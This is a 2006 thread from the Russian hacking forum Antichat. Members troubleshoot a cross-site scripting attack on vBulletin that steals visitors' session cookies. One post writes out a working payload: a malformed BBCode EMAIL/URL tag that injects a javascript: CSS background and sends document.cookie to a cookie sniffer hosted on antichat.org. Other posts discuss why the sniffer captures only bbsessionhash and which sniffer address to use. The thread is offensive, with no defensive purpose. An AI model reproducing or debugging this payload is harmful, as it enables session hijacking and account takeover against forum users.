ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимость в vBulletin. Или abbsessionhash вместо полных куков
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в vBulletin. Или abbsessionhash вместо полных куков
  #1  
Старый 19.01.2006, 12:02
Smart12
Новичок
Регистрация: 19.01.2006
Сообщений: 2
Провел на форуме:
8449

Репутация: 0
По умолчанию Уязвимость в vBulletin. Или abbsessionhash вместо полных куков
Использовал следующее:
http://video.antichat.net/file105.html

Проверка отработала, алерт вылазит.
Запускаю оснолвную процедуру.....
после перехода на искомый сайт создается файл в котором поидее должны лежать куки, а там лежит только bbsessionhash= значение и больше ничего.
Попробовал прям из формы ПМ, в заголовок вставил искомый код, в алерте выдает полные куки. При отработке скрипта - только сессионхэш.
В чем может быть причина? на заплатку не похоже, иначе проверки бы не работали.

Спасибо.
 
Ответить с цитированием

  #2  
Старый 22.01.2006, 17:25
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
А у меня другая проблема ...уже говорил сегодня в другой теме ... короче вставляю сплойт в форуме ..

Код HTML:
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip	t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`
алерт есть , сплойт не палиться но на сниффе пусто ...может я что нить не так сделал ? если да то буду блогодарен если подскажите...и еще я сижу под ИЕ! а не под оперой иль под файерфокс
 
Ответить с цитированием

  #3  
Старый 23.01.2006, 23:15
woolf
Новичок
Регистрация: 23.01.2006
Сообщений: 1
Провел на форуме:
566

Репутация: 0
По умолчанию
у меня таже проблема что и у Smart12...
помогите..
 
Ответить с цитированием

  #4  
Старый 24.01.2006, 22:47
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
Цитата:
antichat.org/s/Electro.gif?"+document.cookie)`
интересно откуда ты это взял, адрес сниффера: antichat.ru/sniff/s.jpg вроде
 
Ответить с цитированием

  #5  
Старый 24.01.2006, 22:52
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
вообще-то на antichat.org можно зарегить персональный сниффер.. =) Так что все верно.
 
Ответить с цитированием

  #6  
Старый 23.02.2006, 12:52
Smart12
Новичок
Регистрация: 19.01.2006
Сообщений: 2
Провел на форуме:
8449

Репутация: 0
По умолчанию
Может появились мысли?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимость в vBulletin 3.5.0 Имба Форумы 0 20.11.2005 03:06
Подмен КУКОВ Ipb2.0.4 Tem Форумы 10 13.11.2005 13:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ